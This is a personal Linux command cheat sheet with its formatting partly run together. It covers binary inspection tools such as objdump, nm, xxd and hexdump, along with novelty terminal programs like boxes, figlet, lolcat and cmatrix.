objdump -p <binary> | grep NEEDEDto see shared object dependencies
nm(list symbols from object files)binwalk(search binary images for embedded files and executable code; TODO)valgrind(suite of tools for debugging and profiling programs; TODO)xxd(make a hex dump or do the reverse)xxd <file>to dump hex for file-bto dump binary instead of hex-rto revert a patched hex dump back into binary format
hexdump(display file contents in hexadecimal, decimal, octal, or ascii)hexdump <file>to dump hex for filehexdump -C <file>to display hex in canonical form (hex+ASCII)
toiletfigletboxesboxes -p <design>boxes -lto list possible designs- Nice ones:
unicornthink,bear,spring,twisted,sunset,santa,cat
boxes -s <width>to specify width
lolcat(color)
cmatrixcacafire(caca-utils)nyancat(awesome)asciiquarium(run in a Fedora Docker container)sl(train)
echo Welcome | boxes | figletecho Welcome back @home, holy! | boxes -d bear -s $COLUMNSecho Welcome back @home, holy! | boxes -d spring -s $((COLUMNS-9))
- GitHub repo: https://github.com/holychowders/linux-reference
- GitHub profile: https://github.com/holychowders